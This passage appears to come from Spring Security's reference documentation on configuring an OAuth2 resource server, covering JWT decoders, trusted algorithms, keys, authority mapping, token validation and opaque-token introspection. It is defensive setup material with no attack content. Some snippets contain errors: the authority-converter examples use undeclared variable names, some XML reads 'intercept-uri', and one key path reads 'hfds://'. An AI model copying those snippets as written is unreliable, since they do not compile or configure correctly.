value=\"${spring.security.oauth2.resourceserver.jwt.jwk-set-uri}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-jwt-jwkseturi-dsl]]\n==== Using `jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured <<oauth2resourceserver-jwt-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n.JWK Set Uri Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwkSetUri = \"https:\/\/idp.example.com\/.well-known\/jwks.json\"\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.com\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-jwt-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n.JWT Decoder Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwtDecoder extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwtDecoder : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtDecoder = myCustomDecoder()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"myCustomDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-jwt-validation,validation>>, <<oauth2resourceserver-jwt-claimsetmapping,mapping>>, or <<oauth2resourceserver-jwt-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-jwt-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-algorithm]]\n=== Configuring Trusted Algorithms\n\nBy default, `NimbusJwtDecoder`, and hence Resource Server, will only trust and verify tokens using `RS256`.\n\nYou can customize this via <<oauth2resourceserver-jwt-boot-algorithm,Spring Boot>>, 
<<oauth2resourceserver-jwt-decoder-builder,the NimbusJwtDecoder builder>>, or from the <<oauth2resourceserver-jwt-decoder-jwk-response,JWK Set response>>.\n\n[[oauth2resourceserver-jwt-boot-algorithm]]\n==== Via Spring Boot\n\nThe simplest way to set the algorithm is as a property:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n jws-algorithm: RS512\n jwk-set-uri: https:\/\/idp.example.org\/.well-known\/jwks.json\n----\n\n[[oauth2resourceserver-jwt-decoder-builder]]\n==== Using a Builder\n\nFor greater power, though, we can use a builder that ships with `NimbusJwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).build();\n}\n----\n\nCalling `jwsAlgorithm` more than once will configure `NimbusJwtDecoder` to trust more than one algorithm, like so:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).jwsAlgorithm(EC512).build();\n}\n----\n\nOr, you can call `jwsAlgorithms`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithms(algorithms -> {\n algorithms.add(RS512);\n algorithms.add(EC512);\n }).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-jwk-response]]\n==== From JWK Set response\n\nSince Spring Security's JWT support is based off of Nimbus, you can use all it's great features as well.\n\nFor example, Nimbus has a `JWSKeySelector` implementation that will select the set of algorithms based on the JWK Set URI response.\nYou can use it to generate a `NimbusJwtDecoder` like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n \/\/ makes a request to the JWK Set endpoint\n JWSKeySelector<SecurityContext> jwsKeySelector =\n JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(this.jwkSetUrl);\n\n DefaultJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor<>();\n jwtProcessor.setJWSKeySelector(jwsKeySelector);\n\n return new NimbusJwtDecoder(jwtProcessor);\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key]]\n=== Trusting a Single Asymmetric Key\n\nSimpler than backing a Resource Server with a JWK Set endpoint is to hard-code an RSA public key.\nThe public key can be provided via <<oauth2resourceserver-jwt-decoder-public-key-boot,Spring Boot>> or by <<oauth2resourceserver-jwt-decoder-public-key-builder,Using a Builder>>.\n\n[[oauth2resourceserver-jwt-decoder-public-key-boot]]\n==== Via Spring Boot\n\nSpecifying a key via Spring Boot is quite simple.\nThe key's location can be specified like so:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n public-key-location: classpath:my-key.pub\n----\n\nOr, to allow for a more sophisticated lookup, you can post-process the `RsaKeyConversionServicePostProcessor`:\n\n[source,java]\n----\n@Bean\nBeanFactoryPostProcessor conversionServiceCustomizer() {\n return beanFactory ->\n beanFactory.getBean(RsaKeyConversionServicePostProcessor.class)\n .setResourceLoader(new CustomResourceLoader());\n}\n----\n\nSpecify your key's location:\n\n```yaml\nkey.location: hfds:\/\/my-key.pub\n```\n\nAnd then autowire the value:\n\n```java\n@Value(\"${key.location}\")\nRSAPublicKey key;\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key-builder]]\n==== Using a Builder\n\nTo wire an `RSAPublicKey` directly, you can simply use the appropriate `NimbusJwtDecoder` builder, like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() 
{\n return NimbusJwtDecoder.withPublicKey(this.key).build();\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-secret-key]]\n=== Trusting a Single Symmetric Key\n\nUsing a single symmetric key is also simple.\nYou can simply load in your `SecretKey` and use the appropriate `NimbusJwtDecoder` builder, like so:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withSecretKey(this.key).build();\n}\n----\n\n[[oauth2resourceserver-jwt-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n.Authorization Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/contacts\/**\", hasAuthority(\"SCOPE_contacts\"))\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_messages\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n[source,java]\n----\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) 
{}\n----\n\n[[oauth2resourceserver-jwt-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`, which is responsible for converting a `Jwt` into an `Authentication`.\n\nAs part of its configuration, we can supply a subsidiary converter to go from `Jwt` to a `Collection` of granted authorities.\nLet's say that that your authorization server communicates authorities in a custom claim called `authorities`.\nIn that case, you can configure the claim that `JwtAuthenticationConverter` should inspect, like so:\n\n.Authorities Claim Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class CustomAuthoritiesClaimName extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(jwtAuthenticationConverter())\n )\n );\n }\n}\n\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthoritiesClaimName(\"authorities\");\n\n JwtAuthenticationConverter authenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(authoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authoritiesClaimName\" value=\"authorities\"\/>\n<\/bean>\n----\n====\n\nYou can also configure the authority prefix to be different as well.\nInstead of prefixing each authority with `SCOPE_`, you can change it to `ROLE_` like so:\n\n.Authorities Prefix Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthorityPrefix(\"ROLE_\");\n\n JwtAuthenticationConverter authenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(authoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri 
pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authorityPrefix\" value=\"ROLE_\"\/>\n<\/bean>\n----\n====\n\nOr, you can remove the prefix altogether by calling `JwtGrantedAuthoritiesConverter#setAuthorityPrefix(\"\")`.\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n[source,java]\n----\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n----\n\n[[oauth2resourceserver-jwt-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-jwt-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer uri, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-jwt-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWT's typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new IssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n----\n\n[NOTE]\nBy default, Resource Server configures a clock skew of 30 seconds.\n\n[[oauth2resourceserver-jwt-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n[source,java]\n----\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new JwtClaimValidator<List<String>>(AUD, aud -> aud.contains(\"messaging\"));\n}\n----\n\nOr, for more control you can implement your own `OAuth2TokenValidator`:\n\n[source,java]\n----\nstatic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"custom_code\", 
\"Custom error message\", null);\n\n @Override\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n\n\/\/ ...\n\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new AudienceValidator();\n}\n----\n\nThen, to add into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = audienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n----\n\n[[oauth2resourceserver-jwt-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library or for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> null));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, 
Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String,Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied like normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-jwt-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectTimeout(Duration.ofSeconds(60))\n .setReadTimeout(Duration.ofSeconds(60))\n .build();\n\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).restOperations(rest).build();\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-opaque-minimalconfiguration]]\n=== Minimal Configuration for Introspection\n\nTypically, an opaque token can be verified via an https:\/\/tools.ietf.org\/html\/rfc7662[OAuth 2.0 Introspection Endpoint], hosted by the authorization server.\nThis can be handy when revocation is a requirement.\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server that uses introspection consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the introspection endpoint details.\n\n[[oauth2resourceserver-opaque-introspectionuri]]\n==== Specifying the Authorization Server\n\nTo specify where the introspection endpoint is, simply do:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.com\/introspect\n client-id: client\n client-secret: secret\n----\n\nWhere `https:\/\/idp.example.com\/introspect` is the introspection endpoint hosted by your authorization server and `client-id` and `client-secret` are the credentials needed to hit that endpoint.\n\nResource Server will use these properties to further self-configure and subsequently validate incoming tokens.\n\n[NOTE]\nWhen using introspection, the authorization server's word is the law.\nIf the authorization server responds that the token is valid, then it is.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen these properties and dependencies are used, Resource Server will automatically configure itself to validate Opaque Bearer Tokens.\n\nThis startup process is quite a bit simpler than for JWTs since no endpoints need to be discovered and no additional validation rules get added.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any 
request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven an Opaque Token, Resource Server will:\n\n1. Query the provided introspection endpoint using the provided credentials and the token\n2. Inspect the response for an `{ 'active' : true }` attribute\n3. Map each scope to an authority with the prefix `SCOPE_`\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `{security-api-url}org\/springframework\/security\/oauth2\/core\/OAuth2AuthenticatedPrincipal.html[OAuth2AuthenticatedPrincipal]` object, and `Authentication#getName` maps to the token's `sub` property, if one is present.\n\nFrom here, you may want to jump to:\n\n* <<oauth2resourceserver-opaque-attributes,Looking Up Attributes Post-Authentication>>\n* <<oauth2resourceserver-opaque-authorization-extraction,Extracting Authorities Manually>>\n* <<oauth2resourceserver-opaque-jwt-introspector,Using Introspection with JWTs>>\n\n[[oauth2resourceserver-opaque-attributes]]\n=== Looking Up Attributes Post-Authentication\n\nOnce a token is authenticated, an instance of `BearerTokenAuthentication` is set in the `SecurityContext`.\n\nThis means that it's available in `@Controller` methods when using `@EnableWebMvc` in your configuration:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(BearerTokenAuthentication authentication) {\n return authentication.getTokenAttributes().get(\"sub\") + \" is the subject\";\n}\n----\n\nSince `BearerTokenAuthentication` holds an `OAuth2AuthenticatedPrincipal`, that also means that it's available to controller methods, too:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(@AuthenticationPrincipal OAuth2AuthenticatedPrincipal principal) {\n return principal.getAttribute(\"sub\") + \" is the subject\";\n}\n----\n\n==== Looking Up Attributes Via SpEL\n\nOf course, this also means that attributes can be accessed via SpEL.\n\nFor example, if using `@EnableGlobalMethodSecurity` so that you can use `@PreAuthorize` annotations, you can do:\n\n```java\n@PreAuthorize(\"principal?.attributes['sub'] == 'foo'\")\npublic String forFoosEyesOnly() {\n return \"foo\";\n}\n```\n\n[[oauth2resourceserver-opaque-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server.\nWhen using Opaque Token, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\noverride fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom Opaque Token 
Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myIntrospector()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is an `OpaqueTokenIntrospector`, which decodes `String` tokens into validated instances of `OAuth2AuthenticatedPrincipal`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\nIf the application doesn't expose an `OpaqueTokenIntrospector` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `introspectionUri()` and `introspectionClientCredentials()` or replaced using `introspector()`.\n\nOr, if you're not using Spring Boot at all, then both of these components - the filter chain and an `OpaqueTokenIntrospector` - can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default Opaque Token Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-url pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `OpaqueTokenIntrospector` like so:\n\n.Opaque Token Introspector\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.introspection_uri}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client_id}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client_secret}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-opaque-introspectionuri-dsl]]\n==== Using `introspectionUri()`\n\nAn authorization server's introspection URI can be configured <<oauth2resourceserver-opaque-introspectionuri,as a configuration property>> or it can be supplied in the DSL:\n\n.Introspection URI Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospectionUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n 
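\/\/ the endpoint and credentials below take precedence over the\n \/\/ corresponding Boot configuration properties\n 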
